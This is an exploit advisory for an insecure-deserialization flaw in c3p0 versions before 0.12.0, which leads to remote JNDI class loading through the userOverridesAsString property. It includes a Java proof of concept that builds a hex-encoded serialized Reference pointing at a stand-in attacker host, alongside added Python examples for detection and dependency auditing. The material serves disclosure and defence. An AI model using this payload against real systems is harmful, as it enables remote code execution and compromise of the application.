=============================================================================================================================================
| # Title : c3p0 prior to version 0.12.0 via userOverridesAsString Insecure Deserialization and Remote JNDI Class Loading |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.mchange.com/projects/c3p0/ |
=============================================================================================================================================
[+] Summary : A critical vulnerability in c3p0 prior to version 0.12.0 allows attackers to achieve remote code execution (RCE) through insecure handling of the userOverridesAsString property in several ConnectionPoolDataSource implementations.
Before version 0.12.0, this property was internally stored as a hex-encoded Java-serialized object. If an attacker is able to modify or inject a malicious value into this property — either directly, via crafted serialized objects, or through malicious javax.naming.Reference instances — the application may deserialize untrusted data.
The risk is significantly amplified by legacy behavior in mchange-commons-java, a core dependency of c3p0. Older versions allowed ungated support for remote factoryClassLocation values, enabling remote class loading through embedded JNDI references.
[+] During deserialization:
The hex-encoded string is decoded into a byte array.
The byte array is handed to Java object deserialization.
Any javax.naming.Reference embedded in the stream is dereferenced through JNDI.
The Reference's factoryClassLocation can point at an attacker-controlled server, from which the factory class is downloaded.
That class then runs inside the application's JVM, with the application's privileges (not merely on its CLASSPATH).
This is a full Remote Code Execution condition whenever the attacker can influence the configuration property or the serialized input.
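The chain above starts with a plain hex decode, which means the value can be inspected before it ever reaches a deserializer. The following is an added example, not c3p0's own code: it performs that first step itself and refuses to proceed when the decoded stream embeds a javax.naming.Reference (or the ReferenceIndirector wrapper) or carries a remote factoryClassLocation. The "HexAsciiSerializedMap:" prefix it tolerates, the sample values and all names are assumptions made for the example; the sample streams are constructed stand-ins, not real ObjectOutputStream output.

```python
"""Pre-deserialization gate for a legacy c3p0 userOverridesAsString value.

Added example, not c3p0's own code. Reproduces the first step of the chain
(hex -> bytes) and refuses to hand the bytes to a deserializer when the stream
embeds a javax.naming.Reference or a remote factoryClassLocation.
"""
import re

# Every ObjectOutputStream begins with STREAM_MAGIC (0xACED) and STREAM_VERSION (5).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
# Assumption: the stored value may carry this tag in front of the hex; verify against your version.
HASM_PREFIX = "HexAsciiSerializedMap:"

# Class names whose presence means the value must not be deserialized.
DANGEROUS_CLASSES = (
    b"javax.naming.Reference",
    b"javax.naming.StringRefAddr",
    b"com.mchange.v2.naming.ReferenceIndirector",
)
# A factoryClassLocation pointing off-host is exactly the remote class-loading hook.
REMOTE_LOCATION = re.compile(rb"(?:https?|ftp|ldap)://[^\x00-\x1f\s]+")


def decode_user_overrides(value):
    """Strip the optional prefix and hex-decode; ValueError if the text is not hex."""
    if value.startswith(HASM_PREFIX):
        value = value[len(HASM_PREFIX):]
    value = value.strip().rstrip(";")
    try:
        return bytes.fromhex(value)
    except ValueError as exc:
        raise ValueError("userOverridesAsString is not valid hex") from exc


def inspect_user_overrides(value):
    """Return (safe, findings); deserialize only when safe is True."""
    try:
        raw = decode_user_overrides(value)
    except ValueError as exc:
        return False, [str(exc)]
    if not raw.startswith(JAVA_STREAM_MAGIC):
        return False, ["not a Java serialization stream (bad STREAM_MAGIC)"]
    findings = []
    for name in DANGEROUS_CLASSES:
        if name in raw:
            findings.append("embedded class " + name.decode())
    for match in REMOTE_LOCATION.finditer(raw):
        findings.append("remote factoryClassLocation " + match.group(0).decode(errors="replace"))
    return not findings, findings


# --- constructed stand-in streams (NOT real ObjectOutputStream output) ---------
def _java_utf(text):
    """Java modified-UTF-8 field: 2-byte big-endian length followed by the bytes."""
    data = text.encode("utf-8")
    return len(data).to_bytes(2, "big") + data


def _stand_in_stream(class_name, *string_fields):
    """STREAM_MAGIC, TC_OBJECT (0x73), TC_CLASSDESC (0x72) + class name, then TC_STRING (0x74) fields.
    Only the bytes the gate looks at are modelled; a real stream carries much more."""
    out = JAVA_STREAM_MAGIC + b"\x73\x72" + _java_utf(class_name)
    for field in string_fields:
        out += b"\x74" + _java_utf(field)
    return out


# Shape of what the PoC above produces: a Reference whose factoryClassLocation is attacker-controlled.
MALICIOUS_VALUE = HASM_PREFIX + _stand_in_stream(
    "javax.naming.Reference", "ExploitObject", "http://attacker-server.com/").hex().upper()
# Shape of what a legitimate deployment stores: a serialized Map of per-user overrides.
BENIGN_VALUE = HASM_PREFIX + _stand_in_stream("java.util.HashMap", "maxPoolSize", "20").hex().upper()

if __name__ == "__main__":
    for label, value in (("malicious", MALICIOUS_VALUE), ("benign", BENIGN_VALUE), ("garbage", "not-hex")):
        safe, findings = inspect_user_overrides(value)
        print(f"{label}: {'OK to deserialize' if safe else 'REJECT'} {findings}")
```

This is a substring scan over the raw stream, not a full parser of the Java serialization format, so it is a stopgap for systems that cannot move to 0.12.0 immediately; the real fix is the upgrade, and any value that fails the gate should be treated as an indicator of compromise and logged, not silently dropped.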
[+] Impact
Remote Code Execution (RCE)
Arbitrary class loading from remote servers
Full compromise of application runtime
Potential lateral movement within enterprise environments
[+] POC : C3P0ExploitPayload.java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import javax.naming.Reference;

public class C3P0ExploitPayload {
    public static void main(String[] args) {
        try {
            // 1. Attacker-controlled code base and the class the victim JVM will fetch from it
            String attackerUrl = "http://attacker-server.com/";
            String className = "ExploitObject";

            // Reference(className, factoryClassName, factoryClassLocation): the third argument is the
            // remote factoryClassLocation that an ungated mchange-commons-java will load code from.
            Reference ref = new Reference(className, className, attackerUrl);

            // 2. Serialize the Reference and hex-encode it, the legacy userOverridesAsString format
            byte[] serializedObject = serialize(ref);
            String hexPayload = bytesToHex(serializedObject);

            System.out.println("--- Payload Ready for Injection ---");
            System.out.println("Property: c3p0.userOverridesAsString");
            System.out.println("Value: " + hexPayload);
            System.out.println("\n--- Note ---");
            System.out.println("When this value is placed in c3p0 settings, the application will decode the Hex");
            System.out.println("and deserialize the object, triggering a JNDI Remote Class Loading attack.");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    // Standard Java serialization of the object (produces the AC ED 00 05 stream)
    private static byte[] serialize(Object obj) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(obj);
        oos.close();
        return baos.toByteArray();
    }

    // Upper-case hex, two characters per byte
    private static String bytesToHex(byte[] bytes) {
        StringBuilder sb = new StringBuilder();
        for (byte b : bytes) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString().toUpperCase();
    }
}
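The PoC above only matters on a build that still ships c3p0 older than 0.12.0, so the first check in practice is a dependency audit. The following is an added example, not c3p0 project code: it reads a Maven pom.xml, resolves ${property} versions, and flags com.mchange:c3p0 below the 0.12.0 threshold stated in this advisory. mchange-commons-java is only reported for manual review because the advisory gives no fixed version for its remote factoryClassLocation gating. The sample pom and its version numbers are constructed for this example.

```python
"""Dependency audit against the c3p0 fix threshold (added example, not c3p0 project code)."""
import xml.etree.ElementTree as ET

FIXED_C3P0 = (0, 12, 0)
NS = "{http://maven.apache.org/POM/4.0.0}"


def parse_version(text):
    """'0.9.5.5' -> (0, 9, 5, 5). Trailing qualifiers ('0.9.5-pre9') are dropped."""
    parts = []
    for piece in text.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def is_vulnerable_c3p0(version):
    """True for any parseable version below 0.12.0; tuple comparison is lexicographic."""
    parsed = parse_version(version)
    return bool(parsed) and parsed < FIXED_C3P0


def audit_pom(pom_xml):
    """Return (artifactId, resolvedVersion, status) for each com.mchange artifact found."""
    root = ET.fromstring(pom_xml)
    props = {p.tag.replace(NS, ""): (p.text or "").strip() for p in root.findall(NS + "properties/*")}
    findings = []
    for dep in root.iter(NS + "dependency"):          # covers dependencyManagement too
        gid = (dep.findtext(NS + "groupId") or "").strip()
        aid = (dep.findtext(NS + "artifactId") or "").strip()
        ver = (dep.findtext(NS + "version") or "").strip()
        if ver.startswith("${") and ver.endswith("}"):
            ver = props.get(ver[2:-1], "")            # unresolved -> "" so it is reported, not assumed fixed
        if gid not in ("com.mchange", "c3p0"):        # "c3p0" is the legacy groupId of old releases
            continue
        if aid == "c3p0":
            if not ver:
                status = "UNKNOWN: version managed elsewhere (parent/BOM); check the resolved artifact"
            elif is_vulnerable_c3p0(ver):
                status = "VULNERABLE: below 0.12.0"
            else:
                status = "fixed"
        elif aid == "mchange-commons-java":
            status = "REVIEW: confirm remote factoryClassLocation is gated in this version"
        else:
            continue
        findings.append((aid, ver or "?", status))
    return findings


# Constructed sample pom for this example; versions are illustrative.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>example</groupId><artifactId>app</artifactId><version>1.0</version>
  <properties>
    <c3p0.version>0.9.5.5</c3p0.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>com.mchange</groupId>
      <artifactId>c3p0</artifactId>
      <version>${c3p0.version}</version>
    </dependency>
    <dependency>
      <groupId>com.mchange</groupId>
      <artifactId>mchange-commons-java</artifactId>
      <version>0.2.19</version>
    </dependency>
  </dependencies>
</project>
"""

if __name__ == "__main__":
    for artifact, version, status in audit_pom(SAMPLE_POM):
        print(f"{artifact} {version}: {status}")
```

Versions inherited from a parent POM or a BOM are not visible in the file itself, so an UNKNOWN result means the resolved artifact (for example the jar's manifest in the deployed application) has to be checked rather than assumed safe.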
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================